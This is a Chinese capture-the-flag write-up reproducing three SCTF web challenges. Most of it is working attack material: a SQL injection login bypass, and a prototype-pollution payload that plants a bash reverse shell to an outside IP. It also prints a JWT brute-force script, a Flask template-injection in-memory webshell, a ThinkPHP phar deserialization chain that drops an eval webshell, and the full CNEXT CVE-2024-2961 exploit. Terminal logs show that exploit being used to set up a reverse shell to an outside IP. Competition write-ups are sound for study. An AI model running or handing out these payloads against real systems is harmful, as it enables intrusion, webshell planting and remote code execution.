SCTF复现
Sycserver 当时最后一个污染实在是不会了
Sycserver
登陆时会访问 /config 获取 passwd 的加密公钥,手动加密一下 123' or 1=1# 发包登录拿到 cookie,这里也可以选择禁用前端 js,忘了这个了
看下 robots.txt 里写了个 /ExP0rtApi 路由,H4sIAAAAAAAAA开头的数据是 base64 编码 gzip 压缩的数据,想办法读一下文件,删除 v 会报错Cannot read properties of undefined (reading 'replace')
,ExP0rtApi?v=./&f=app.js
就ok,解密完的app.js
const express = require('express');
const fs = require('fs');
const nodeRsa = require('node-rsa');
const bodyParser = require('body-parser');
const jwt = require('jsonwebtoken');
const crypto = require('crypto');
const SECRET_KEY = crypto.randomBytes(16).toString('hex');
const path = require('path');
const zlib = require('zlib');
const mysql = require('mysql');
const handle = require('./handle');
const cp = require('child_process');
const cookieParser = require('cookie-parser');
// MySQL connection
const con = mysql.createConnection({
host: 'localhost',
user: 'ctf',
password: 'ctf123123',
port: '3306',
database: 'sctf'
});
con.connect((err) => {
if (err) {
console.error('Error connecting to MySQL:', err.message);
setTimeout(con.connect(), 2000); // Retry connection after 2 seconds
} else {
console.log('Connected to MySQL');
}
});
// RSA key generation
const key = new nodeRsa({ b: 1024 });
key.setOptions({ encryptionScheme: 'pkcs1' });
const publicPem = `-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC5nJzSXtjxAB2tuz5WD9B//vLQ
TfCUTc+AOwpNdBsOyoRcupuBmh8XSVnm5R4EXWS6crL5K3LZe5vO5YvmisqAq2IC
XmWF4LwUIUfk4/2cQLNl+A0czlskBZvjQczOKXB+yvP4xMDXuc1hIujnqFlwOpGe
I+Atul1rSE0APhHoPwIDAQAB
-----END PUBLIC KEY-----`;
const privatePem = `-----BEGIN PRIVATE KEY-----
MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBALmcnNJe2PEAHa27
PlYP0H/+8tBN8JRNz4A7Ck10Gw7KhFy6m4GaHxdJWeblHgRdZLpysvkrctl7m87l
i+aKyoCrYgJeZYXgvBQhR+Tj/ZxAs2X4DRzOWyQFm+NBzM4pcH7K8/jEwNe5zWEi
6OeoWXA6kZ4j4C26XWtITQA+Eeg/AgMBAAECgYA+eBhLsUJgckKK2y8StgXdXkgI
lYK31yxUIwrHoKEOrFg6AVAfIWj/ZF+Ol2Qv4eLp4Xqc4+OmkLSSwK0CLYoTiZFY
Jal64w9KFiPUo1S2E9abggQ4omohGDhXzXfY+H8HO4ZRr0TL4GG+Q2SphkNIDk61
khWQdvN1bL13YVOugQJBAP77jr5Y8oUkIsQG+eEPoaykhe0PPO408GFm56sVS8aT
6sk6I63Byk/DOp1MEBFlDGIUWPjbjzwgYouYTbwLwv8CQQC6WjLfpPLBWAZ4nE78
dfoDzqFcmUN8KevjJI9B/rV2I8M/4f/UOD8cPEg8kzur7fHga04YfipaxT3Am1kG
mhrBAkEA90J56ZvXkcS48d7R8a122jOwq3FbZKNxdwKTJRRBpw9JXllCv/xsc2ye
KmrYKgYTPAj/PlOrUmMVLMlEmFXPgQJBAK4V6yaf6iOSfuEXbHZOJBSAaJ+fkbqh
UvqrwaSuNIi72f+IubxgGxzed8EW7gysSWQT+i3JVvna/tg6h40yU0ECQQCe7l8l
zIdwm/xUWl1jLyYgogexnj3exMfQISW5442erOtJK8MFuUJNHFMsJWgMKOup+pOg
xu/vfQ0A1jHRNC7t
-----END PRIVATE KEY-----`;
// Express app setup
const app = express();
app.use(bodyParser.json());
app.use(express.urlencoded({ extended: true }));
app.use(express.static(path.join(__dirname, 'static')));
app.use(cookieParser());
let Reportcache = {};
// Middleware to verify admin
function verifyAdmin(req, res, next) {
const token = req.cookies['auth_token'];
if (!token) {
return res.status(403).json({ message: 'No token provided' });
}
jwt.verify(token, SECRET_KEY, (err, decoded) => {
if (err) {
return res.status(403).json({ message: 'Failed to authenticate token' });
}
if (decoded.role !== 'admin') {
return res.status(403).json({ message: 'Access denied. Admins only.' });
}
req.user = decoded;
next();
});
}
// Routes
app.get('/hello', (req, res) => {
res.send('<h1>Welcome Admin!!!</h1><br><img src="./1.jpeg" />');
});
app.get('/config', (req, res) => {
res.json({ publicKey: publicPem });
});
const decrypt = function(body) {
try {
const pem = privatePem;
const key = new nodeRsa(pem, {
encryptionScheme: 'pkcs1',
b: 1024
});
key.setOptions({ environment: "browser" });
return key.decrypt(body, 'utf8');
} catch (e) {
console.error("decrypt error", e);
return false;
}
};
app.post('/login', (req, res) => {
const encryptedPassword = req.body.password;
const username = req.body.username;
try {
const passwd = decrypt(encryptedPassword);
if (username === 'admin') {
const sql = `SELECT (SELECT password FROM user WHERE username = 'admin') = '${passwd}';`;
con.query(sql, (err, rows) => {
if (err) throw new Error(err.message);
if (rows[0][Object.keys(rows[0])]) {
const token = jwt.sign({ username, role: username }, SECRET_KEY, { expiresIn: '1h' });
res.cookie('auth_token', token, { secure: false });
res.status(200).json({ success: true, message: 'Login Successfully' });
} else {
res.status(200).json({ success: false, message: 'Error Password!' });
}
});
} else {
res.status(403).json({ success: false, message: 'This Website Only Open for admin' });
}
} catch (error) {
res.status(500).json({ success: false, message: 'Error decrypting password!' });
}
});
app.get('/ExP0rtApi', (req, res) => {
let rootpath = req.query.v;
let file = req.query.f;
file = file.replace(/\\.\\.\\//g, '');
rootpath = rootpath.replace(/\\.\\.\\//g, '');
if (rootpath === '') {
if (file === '') {
return res.status(500).send('Try to find parameters HaHa');
} else {
rootpath = "static";
}
}
const filePath = path.join(__dirname, rootpath + "/" + file);
if (!fs.existsSync(filePath)) {
return res.status(404).send('File not found');
}
fs.readFile(filePath, (err, fileData) => {
if (err) {
console.error('Error reading file:', err);
return res.status(500).send('Error reading file');
}
zlib.gzip(fileData, (err, compressedData) => {
if (err) {
console.error('Error compressing file:', err);
return res.status(500).send('Error compressing file');
}
const base64Data = compressedData.toString('base64');
res.send(base64Data);
});
});
});
app.get("/report", (req, res) => {
res.sendFile(path.join(__dirname, "static", "report_noway_dirsearch.html"));
});
app.post("/report", verifyAdmin, (req, res) => {
const { user, date, reportmessage } = req.body;
if (Reportcache[user] === undefined) {
Reportcache[user] = {};
}
Reportcache[user][date] = reportmessage;
res.status(200).send("<script>alert('Report Success');window.location.href='/report'</script>");
});
app.get('/countreport', (req, res) => {
let count = 0;
for (const user in Reportcache) {
count += Object.keys(Reportcache[user]).length;
}
res.json({ count });
});
// Check current running user
app.get("/VanZY_s_T3st", (req, res) => {
const command = 'whoami';
const cmd = cp.spawn(command, []);
cmd.stdout.on('data', (data) => {
res.status(200).end(data.toString());
});
});
// Start server
app.listen(3000, () => {
console.log('Server running on http://localhost:3000');
});
再读取一下require里的handle/index.js和child_process.js
index.js,封装了一下child_process
var ritm = require('require-in-the-middle');
var patchChildProcess = require('./child_process');
new ritm.Hook(
['child_process'],
function (module, name) {
switch (name) {
case 'child_process': {
return patchChildProcess(module);
}
}
}
);
child_process.js
function patchChildProcess(cp) {
cp.execFile = new Proxy(cp.execFile, { apply: patchOptions(true) });
cp.fork = new Proxy(cp.fork, { apply: patchOptions(true) });
cp.spawn = new Proxy(cp.spawn, { apply: patchOptions(true) });
cp.execFileSync = new Proxy(cp.execFileSync, { apply: patchOptions(true) });
cp.execSync = new Proxy(cp.execSync, { apply: patchOptions() });
cp.spawnSync = new Proxy(cp.spawnSync, { apply: patchOptions(true) });
return cp;
}
function patchOptions(hasArgs) {
return function apply(target, thisArg, args) {
var pos = 1;
if (pos === args.length) {
args[pos] = prototypelessSpawnOpts();
} else if (pos < args.length) {
if (hasArgs && (Array.isArray(args[pos]) || args[pos] == null)) {
pos++;
}
if (typeof args[pos] === 'object' && args[pos] !== null) {
args[pos] = prototypelessSpawnOpts(args[pos]);
} else if (args[pos] == null) {
args[pos] = prototypelessSpawnOpts();
} else if (typeof args[pos] === 'function') {
args.splice(pos, 0, prototypelessSpawnOpts());
}
}
return target.apply(thisArg, args);
};
}
function prototypelessSpawnOpts(obj) {
var prototypelessObj = Object.assign(Object.create(null), obj);
prototypelessObj.env = Object.assign(Object.create(null), prototypelessObj.env || process.env);
return prototypelessObj;
}
module.exports = patchChildProcess;
/report路由非常奇怪地加了个Reportcache[user][date] = reportmessage;
一眼原型链污染,污染点在后面/VanZY_s_T3st的spawn里,传了个command [],让上面child_process.js的pos变成2,注入数组第三个参数,污染到spawn的Options参数
进到prototypelessSpawnOpts( )
function prototypelessSpawnOpts(obj) {
var prototypelessObj = Object.assign(Object.create(null), obj);
prototypelessObj.env = Object.assign(Object.create(null), prototypelessObj.env || process.env);
return prototypelessObj;
}
环境变量注入,当你在 Bash 中定义一个函数,比如 whoami
,Bash 会创建一个名为 BASH_FUNC_whoami%%
的环境变量,里面存储了这个函数的定义,这里把他覆盖成弹shell的,然后访问/VanZY_s_T3st触发
{
"user": "__proto__",
"date": 2,
"reportmessage": {
"shell": "/bin/bash",
"env": {
"BASH_FUNC_whoami%%": "() { bash -c 'bash -i >& /dev/tcp/12.34.56.78/2333 0>&1'; }"
}
}
}
或者直接打这个,NODE_OPTIONS
放到env里面
ezRender
漏洞点出现在 User.py 里面的
def handler(self):
self.handle = open("/dev/random", "rb")
def setSecret(self):
secret = self.Registertime
try:
if self.handle == None:
self.handler()
secret += str(self.handle.read(22).hex())
except Exception as e:
print("this file is not exist or be removed")
return secret
hint 给了 ulimit -n =2048 handler句柄同时只能打开最多2048个 /dev/random ,超过这个值就会报错,return回secret = self.Registertime,这样secret值大概范围就有了,但是我们注册和服务端那边有一点时差,需要爆破一下。
import time
import base64
import jwt
import json
import requests
from concurrent.futures import ThreadPoolExecutor
url = "1.95.40.5:31240"
register_url = url + '/register'
login_url = url +'/login'
admin_url = url +'/admin'
def make_register_request(i):
res = requests.post(register_url, json={"username": "admin" + str(i), "password": "123456"})
return res
executor = ThreadPoolExecutor(max_workers=10)
try:
for i in range(2055):
executor.submit(make_register_request, i)
finally:
executor.shutdown(wait=True)
print("done")
key = str(time.time())[0:10]
res = requests.post(register_url, json={"username": "aniale", "password": "123456"})
token = requests.post(login_url, json={"username": "aniale", "password": "123456"}).headers['Set-Cookie'].split('Token=')[1]
jwtData = (json.loads(base64.b64decode(token))["secret"])
print(jwtData)
for i in range(int(key) - 2000, int(key) + 2000):
try:
print(jwt.decode(jwtData, str(i), algorithms='HS256'))
key = str(i)
except:
pass
print("key:" + key)
secret = {'name': 'aniale', 'is_admin': '1'}
verify_c = jwt.encode(secret, key, algorithm='HS256')
infor = {'name': 'aniale', 'secret': verify_c}
token = base64.b64encode(json.dumps(infor).encode()).decode()
拿到key造出来token就可以进到admin路由了,ulimit 满了之后__builtins__
会报错,需要删除几个用户使得用户数量少于 2048
这个题不出网弹不了shell,打一个内存马
shellcode = '''
__import__('flask').current_app._got_first_request=False;__import__('flask').current_app.add_url_rule('/shell','shell',lambda:__import__('os').popen(__import__('flask').request.args.get('cmd','/readflag')).read())
'''.strip()
shell_base = base64.b64encode(shellcode.encode()).decode()
# 爆破目标方法位置。
for i in range(1, 81):
code = '''
{{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(PLACE).__init__.__globals__.__getitem__("__builtins__").__getitem__("ex"+"ec")("import base64;ex"+"ec(base64.b64decode(b'EVIL').decode())")}}
'''.strip()
code = code.replace("PLACE", str(i))
code = code.replace("EVIL", shell_base)
response = rs.post(admin_url, data={"code": code}, cookies={'Token': token})
if response.status_code != 500:
print(i,response.text)
response = rs.get(tar_shell_url, params={'cmd': '/readflag'}, cookies={'Token': token})
print(response.text)
break
simpleshop
比赛时候打 CVE-2023-3232 能拿个 admin 的 token 值,测了半天功能点,最后发现 hint 跟后台没关系 =_=,是一个CVE-2024-6944的 phar 反序列化
回到代码审计,不难发现是个 tp 框架的 cms,恰好这段时间在审洞,先本地搭一下,但是开源没有 pc 的 web 界面,本地运行有点慢
环境搭建照着官方文档安装就完事了,我这里使用 win + phpstudy + php7.2.9nts + mysql + nginx ,搭建完去后台给自己创建个用户
POC
首先说一下复现的坑点,第一个是你要确保自己的 php 开了 phar 功能;第二个是 file_put_contents 里面的内容要写对,尤其是写文件的路径,对应好自己的环境;第三个是由于他会读取缓存,所以你一个名字的图片只能打一次,不然后面你怎么改都没变化的,稍微改下名字就行;第四个是可能你上传图片会没响应,如果这样的话直接按照我下面的建议来;第五个是 phphar://ar:// 这个绕过最好这么写,我按照有的文章他 phpharar 不好使
建议:生成好的 phar 文件直接改个jpg后缀先丢到上传路径下面,省略上传的那些步骤(知道怎么做就行)
<?php
namespace PhpOffice\PhpSpreadsheet\Collection {
class Cells {
private $cache;
public function __construct($evil) {
$this->cache = $evil;
}
}
}
namespace think\log {
class Channel {
protected $logger;
protected $lazy = false;
public function __construct($evil) {
$this->logger = $evil;
}
}
}
namespace think\log\driver {
class Socket {
protected $app;
protected $config;
public function __construct() {
$this->config = [
'debug' => true,
'force_client_ids' => 'Not Null',
'allow_client_ids' => [],
'format_head' => [new \think\view\driver\Php(), 'display'],
];
$this->app = new \think\App();
}
}
}
namespace think {
class App {
protected $instances = [];
public function __construct() {
$this->instances = [
'think\Request' => new Request(),
];
}
}
class Request {
protected $url;
public function __construct() {
$this->url = '<?php file_put_contents("D:/Major/phpstudy_pro/WWW/crmeb/public/uploads/store/comment/20241116/aniale.php", \'<?php eval($_POST[1]); ?>\', FILE_APPEND); ?>';
}
}
}
namespace think\view\driver {
class Php {
}
}
namespace {
$c = new think\log\driver\Socket();
$b = new think\log\Channel($c);
$a = new PhpOffice\PhpSpreadsheet\Collection\Cells($b);
var_dump($a);
ini_set('phar.readonly', 0);
$phar = new Phar('poc.phar');
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString('aniale.jpg', 'eviltest');
$phar->stopBuffering();
}
反序列化链
找到图片处理的点进行分析\app\api\controller\v1\PublicController::get_image_base64
,不是很好调试,这次是先分析再调试的,一些复杂想不清楚的地方会加调试图(我懒得全换一遍图了)
主要就是尝试从缓存中获取已处理的 Base64 值;如果缓存不存在,就去远程下载图片,put_image 一下,控制刚才的 code 参数的值里有一个 phar 就会进入到readfile()
中,那么就可以在code
中触发包含能触发 phar 解析,看的出来想过滤掉 phar,但是因为没有循环校验导致一个双写绕过 phphar://ar:// 就可以触发解析我们上传的phar图片
入口找到了开始分析链子,在全局搜索魔术方法__construct()
和__destruct()
位于 vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Collection/Cells.php
的 $cache 可控
这里调用 $cache 的deleteMultiple()
时候会触发POC里面 crmeb/vendor/topthink/framework/src/think/log/Channel.php 的__call()
从log()
到record()
进到record()
,不难发现只要给 $lazy 赋值一个 false 即可进入save()
进到save()
,我们发现这里调用了 $logger 的save()
我们令 $logger 为vendor/topthink/framework/src/think/log/driver/Socket.php 对象,这里就可以调用 Socket 类的save()
跟进check()
,需要返回一个 true ,有两个点可以返回
首先 $tabid 或者 force_client_id 不为空,然后就是判断 $allowClientIds 是否为空,如果为空,就可以走到后半部分得到 true。
回到save()
,到了这条链子最关键的部分,有点绕
我们需要进一步修改$config
数组里面的 debug 值为真和一个非空的format_head
去invoke
调用下一个对象,config['format_head']
可控,$currentUri
是传入的参数,在后面分析
我们首先分析第二个 if 条件,跟进invoke()
看一下,这个在 Container 类里面有定义,恰好是我们想要的,下文会给出原因
第三个分支能通过构造参数,做到调用我们想要调用的类和方法,跟进
invokeMethod()
,就是一个反射调用
调用过程清楚了,现在开始找类方法和参数,在POC里面我们构造了一个'format_head'=> [new \think\view\driver\Php(), 'display'],
非常巧妙,找到了我们的命令执行点,将 url 作为参数调用
简单测试一下这个,发现不影响我们命令执行,开始准备构造参数
对于第一个 if 条件,这里的 $app 我们可控
看一下exists()
方法,其实就是一个 Container 类的exists()
->getAlias()
->bind()
方法去看一下对象的 bind[] 里面有没有绑定 request,为了满足条件我们需要找一个 exists request对象的类
在 POC 里面我们选择了 extends Container 的 App 类同时给 $instance 加一个 'think\Request' => new Request()
,invoke 的时候正好就会调用App extends 的 Container 中我们上述分析的内容
进到下一步的Request类的 url()
方法看一下,这里就在构造命令执行的参数了,
调用domain()
,跟进看一下
跟进scheme()
用来确认是不是 http/https ,host()
用来确定 host ,总而言之,最后就会返回http:// . POC里我们构造的 url 参数
万事俱备!进行最后的反射调用
在客服界面找到一个文件上传的点,先把生成的 phar 文件改成 jpg 再 gzip 压缩一下,然后再改成 jpg 后缀,拿到上传的路径,然后再在 base64的路由里面去触发 phar 的解析
后续
终于我们完成了这道题的第一步,后续的打 cnext 那个经典 CVE,弹 shell 加提权,这里没环境就不复现了,照搬一下别人的 wp
连蚁剑写一个 php 文件,说实话没看懂这个为什么这么做
<?php
@mkdir('img');chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');
$data = file_get_contents($_POST['file']);
echo "File contents: $data";
拿脚本开打,我建议在 linux 环境下比如 wsl 中,因为类似的题我打了几次都是在这个环境成功的,win好像是不太行,以后学了 pwn 再好好研究研究
#!/usr/bin/env python3
#
# CNEXT: PHP file-read to RCE (CVE-2024-2961)
# Date: 2024-05-27
# Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS)
#
# TODO Parse LIBC to know if patched
#
# INFORMATIONS
#
# To use, implement the Remote class, which tells the exploit how to send the payload.
#
from __future__ import annotations
import base64
import zlib
from dataclasses import dataclass
from requests.exceptions import ConnectionError, ChunkedEncodingError
from pwn import *
from ten import *
HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")
class Remote:
def __init__(self, url: str) -> None:
self.url = url
self.session = Session()
def send(self, path: str) -> Response:
"""Sends given `path` to the HTTP server. Returns the response.
"""
return self.session.post(self.url, data={"file": path})
def download(self, path: str) -> bytes:
"""Returns the contents of a remote file.
"""
path = f"php://filter/convert.base64-encode/resource={path}"
response = self.send(path)
data = response.re.search(b"File contents: (.*)", flags=re.S).group(1)
return base64.decode(data)
@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep_time", "Time to sleep to assert that the exploit worked. By default, 1.")
@arg("heap", "Address of the main zend_mm_heap structure.")
@arg(
"pad",
"Number of 0x100 chunks to pad with. If the website makes a lot of heap "
"operations with this size, increase this. Defaults to 20.",
)
@dataclass
class Exploit:
url: str
command: str
sleep: int = 1
heap: str = None
pad: int = 20
def __post_init__(self):
self.remote = Remote(self.url)
self.log = logger("EXPLOIT")
self.info = {}
self.heap = self.heap and int(self.heap, 16)
def check_vulnerable(self) -> None:
def safe_download(path: str) -> bytes:
try:
return self.remote.download(path)
except ConnectionError:
failure("Target not [b]reachable[/] ?")
def check_token(text: str, path: str) -> bool:
result = safe_download(path)
return text.encode() == result
text = tf.random.string(50).encode()
base64 = b64(text, misalign=True).decode()
path = f"data:text/plain;base64,{base64}"
result = safe_download(path)
if text not in result:
msg_failure("Remote.download did not return the test string")
print("--------------------")
print(f"Expected test string: {text}")
print(f"Got: {result}")
print("--------------------")
failure("If your code works fine, it means that the [i]data://[/] wrapper does not work")
msg_info("The [i]data://[/] wrapper works")
text = tf.random.string(50)
base64 = b64(text.encode(), misalign=True).decode()
path = f"php://filter//resource=data:text/plain;base64,{base64}"
if not check_token(text, path):
failure("The [i]php://filter/[/] wrapper does not work")
msg_info("The [i]php://filter/[/] wrapper works")
text = tf.random.string(50)
base64 = b64(compress(text.encode()), misalign=True).decode()
path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}"
if not check_token(text, path):
failure("The [i]zlib[/] extension is not enabled")
msg_info("The [i]zlib[/] extension is enabled")
msg_success("Exploit preconditions are satisfied")
def get_file(self, path: str) -> bytes:
with msg_status(f"Downloading [i]{path}[/]..."):
return self.remote.download(path)
def get_regions(self) -> list[Region]:
"""Obtains the memory regions of the PHP process by querying /proc/self/maps."""
maps = self.get_file("/proc/self/maps")
maps = maps.decode()
PATTERN = re.compile(
r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
)
regions = []
for region in table.split(maps, strip=True):
if match := PATTERN.match(region):
start = int(match.group(1), 16)
stop = int(match.group(2), 16)
permissions = match.group(3)
path = match.group(4)
if "/" in path or "[" in path:
path = path.rsplit(" ", 1)[-1]
else:
path = ""
current = Region(start, stop, permissions, path)
regions.append(current)
else:
print(maps)
failure("Unable to parse memory mappings")
self.log.info(f"Got {len(regions)} memory regions")
return regions
def get_symbols_and_addresses(self) -> None:
"""Obtains useful symbols and addresses from the file read primitive."""
regions = self.get_regions()
LIBC_FILE = "/dev/shm/cnext-libc"
self.info["heap"] = self.heap or self.find_main_heap(regions)
libc = self._get_region(regions, "libc-", "libc.so")
self.download_file(libc.path, LIBC_FILE)
self.info["libc"] = ELF(LIBC_FILE, checksec=False)
self.info["libc"].address = libc.start
def _get_region(self, regions: list[Region], *names: str) -> Region:
"""Returns the first region whose name matches one of the given names."""
for region in regions:
if any(name in region.path for name in names):
break
else:
failure("Unable to locate region")
return region
def download_file(self, remote_path: str, local_path: str) -> None:
"""Downloads `remote_path` to `local_path`"""
data = self.get_file(remote_path)
Path(local_path).write(data)
def find_main_heap(self, regions: list[Region]) -> Region:
# Any anonymous RW region with a size superior to the base heap size is a
# candidate. The heap is at the bottom of the region.
heaps = [
region.stop - HEAP_SIZE + 0x40
for region in reversed(regions)
if region.permissions == "rw-p"
and region.size >= HEAP_SIZE
and region.stop & (HEAP_SIZE-1) == 0
and region.path in ("", "[anon:zend_alloc]")
]
if not heaps:
failure("Unable to find PHP's main heap in memory")
first = heaps[0]
if len(heaps) > 1:
heaps = ", ".join(map(hex, heaps))
msg_info(f"Potential heaps: [i]{heaps}[/] (using first)")
else:
msg_info(f"Using [i]{hex(first)}[/] as heap")
return first
def run(self) -> None:
self.check_vulnerable()
self.get_symbols_and_addresses()
self.exploit()
def build_exploit_path(self) -> str:
LIBC = self.info["libc"]
ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
ADDR_EFREE = LIBC.symbols["__libc_system"]
ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]
ADDR_HEAP = self.info["heap"]
ADDR_FREE_SLOT = ADDR_HEAP + 0x20
ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168
ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10
CS = 0x100
# Pad needs to stay at size 0x100 at every step
pad_size = CS - 0x18
pad = b"\x00" * pad_size
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = compressed_bucket(pad)
step1_size = 1
step1 = b"\x00" * step1_size
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1, CS)
step1 = compressed_bucket(step1)
# Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
# ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"
step2_size = 0x48
step2 = b"\x00" * (step2_size + 8)
step2 = chunked_chunk(step2, CS)
step2 = chunked_chunk(step2)
step2 = compressed_bucket(step2)
step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
step2_write_ptr = chunked_chunk(step2_write_ptr)
step2_write_ptr = compressed_bucket(step2_write_ptr)
step3_size = CS
step3 = b"\x00" * step3_size
assert len(step3) == CS
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = compressed_bucket(step3)
step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
assert len(step3_overflow) == CS
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = compressed_bucket(step3_overflow)
step4_size = CS
step4 = b"=00" + b"\x00" * (step4_size - 1)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = compressed_bucket(step4)
# This chunk will eventually overwrite mm_heap->free_slot
# it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
step4_pwn = ptr_bucket(
0x200000,
0,
# free_slot
0,
0,
ADDR_CUSTOM_HEAP, # 0x18
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
ADDR_HEAP, # 0x140
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
size=CS,
)
step4_custom_heap = ptr_bucket(
ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
)
step4_use_custom_heap_size = 0x140
COMMAND = self.command
COMMAND = f"kill -9 $PPID; {COMMAND}"
if self.sleep:
COMMAND = f"sleep {self.sleep}; {COMMAND}"
COMMAND = COMMAND.encode() + b"\x00"
assert (
len(COMMAND) <= step4_use_custom_heap_size
), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")
step4_use_custom_heap = COMMAND
step4_use_custom_heap = qpe(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)
pages = (
step4 * 3
+ step4_pwn
+ step4_custom_heap
+ step4_use_custom_heap
+ step3_overflow
+ pad * self.pad
+ step1 * 3
+ step2_write_ptr
+ step2 * 2
)
resource = compress(compress(pages))
resource = b64(resource)
resource = f"data:text/plain;base64,{resource.decode()}"
filters = [
# Create buckets
"zlib.inflate",
"zlib.inflate",
# Step 0: Setup heap
"dechunk",
"convert.iconv.L1.L1",
# Step 1: Reverse FL order
"dechunk",
"convert.iconv.L1.L1",
# Step 2: Put fake pointer and make FL order back to normal
"dechunk",
"convert.iconv.L1.L1",
# Step 3: Trigger overflow
"dechunk",
"convert.iconv.UTF-8.ISO-2022-CN-EXT",
# Step 4: Allocate at arbitrary address and change zend_mm_heap
"convert.quoted-printable-decode",
"convert.iconv.L1.L1",
]
filters = "|".join(filters)
path = f"php://filter/read={filters}/resource={resource}"
return path
@inform("Triggering...")
def exploit(self) -> None:
path = self.build_exploit_path()
start = time.time()
try:
self.remote.send(path)
except (ConnectionError, ChunkedEncodingError):
pass
msg_print()
if not self.sleep:
msg_print(" [b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]")
elif start + self.sleep <= time.time():
msg_print(" [b white on black] EXPLOIT [/][b white on green] SUCCESS [/]")
else:
# Wrong heap, maybe? If the exploited suggested others, use them!
msg_print(" [b white on black] EXPLOIT [/][b white on red] FAILURE [/]")
msg_print()
def compress(data) -> bytes:
"""Returns data suitable for `zlib.inflate`.
"""
# Remove 2-byte header and 4-byte checksum
return zlib.compress(data, 9)[2:-4]
def b64(data: bytes, misalign=True) -> bytes:
payload = base64.encode(data)
if not misalign and payload.endswith("="):
raise ValueError(f"Misaligned: {data}")
return payload.encode()
def compressed_bucket(data: bytes) -> bytes:
"""Returns a chunk of size 0x8000 that, when dechunked, returns the data."""
return chunked_chunk(data, 0x8000)
def qpe(data: bytes) -> bytes:
"""Emulates quoted-printable-encode.
"""
return "".join(f"={x:02x}" for x in data).upper().encode()
def ptr_bucket(*ptrs, size=None) -> bytes:
"""Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
if size is not None:
assert len(ptrs) * 8 == size
bucket = b"".join(map(p64, ptrs))
bucket = qpe(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = compressed_bucket(bucket)
return bucket
def chunked_chunk(data: bytes, size: int = None) -> bytes:
"""Constructs a chunked representation of the given chunk. If size is given, the
chunked representation has size `size`.
For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.
"""
# The caller does not care about the size: let's just add 8, which is more than
# enough
if size is None:
size = len(data) + 8
keep = len(data) + len(b"\n\n")
size = f"{len(data):x}".rjust(size - keep, "0")
return size.encode() + b"\n" + data + b"\n"
@dataclass
class Region:
"""A memory region."""
start: int
stop: int
permissions: str
path: str
@property
def size(self) -> int:
return self.stop - self.start
Exploit()
root@webn1ght:~/poc/php-filter-iconv-main# python3 cnext-exploit.py http://1.95.73.253/uploads/store/comment/20240928/111aaa.php 'echo "/bin/bash -c \"bash -i >& /dev/tcp/112.124.59.213/8888 0>&1\"" > /tmp/night'
[*] The data:// wrapper works
[*] The php://filter/ wrapper works
[*] The zlib extension is enabled
[+] Exploit preconditions are satisfied
[*] Using 0x7f1ce1e00040 as heap
[!] Could not populate PLT: Invalid argument (UC_ERR_ARG)
EXPLOIT SUCCESS
root@webn1ght:~/poc/php-filter-iconv-main# python3 cnext-exploit.py http://1.95.73.253/uploads/store/comment/20240928/111aaa.php 'chmod +x /tmp/night'
[*] The data:// wrapper works
[*] The php://filter/ wrapper works
[*] The zlib extension is enabled
[+] Exploit preconditions are satisfied
[*] Using 0x7f1ce1e00040 as heap
[!] Could not populate PLT: Invalid argument (UC_ERR_ARG)
EXPLOIT SUCCESS
root@webn1ght:~/poc/php-filter-iconv-main# python3 cnext-exploit.py http://1.95.73.253/uploads/store/comment/20240928/111aaa.php 'bash /tmp/night'
[*] The data:// wrapper works
[*] The php://filter/ wrapper works
[*] The zlib extension is enabled
[+] Exploit preconditions are satisfied
[*] Using 0x7f1ce1e00040 as heap
[!] Could not populate PLT: Invalid argument (UC_ERR_ARG)
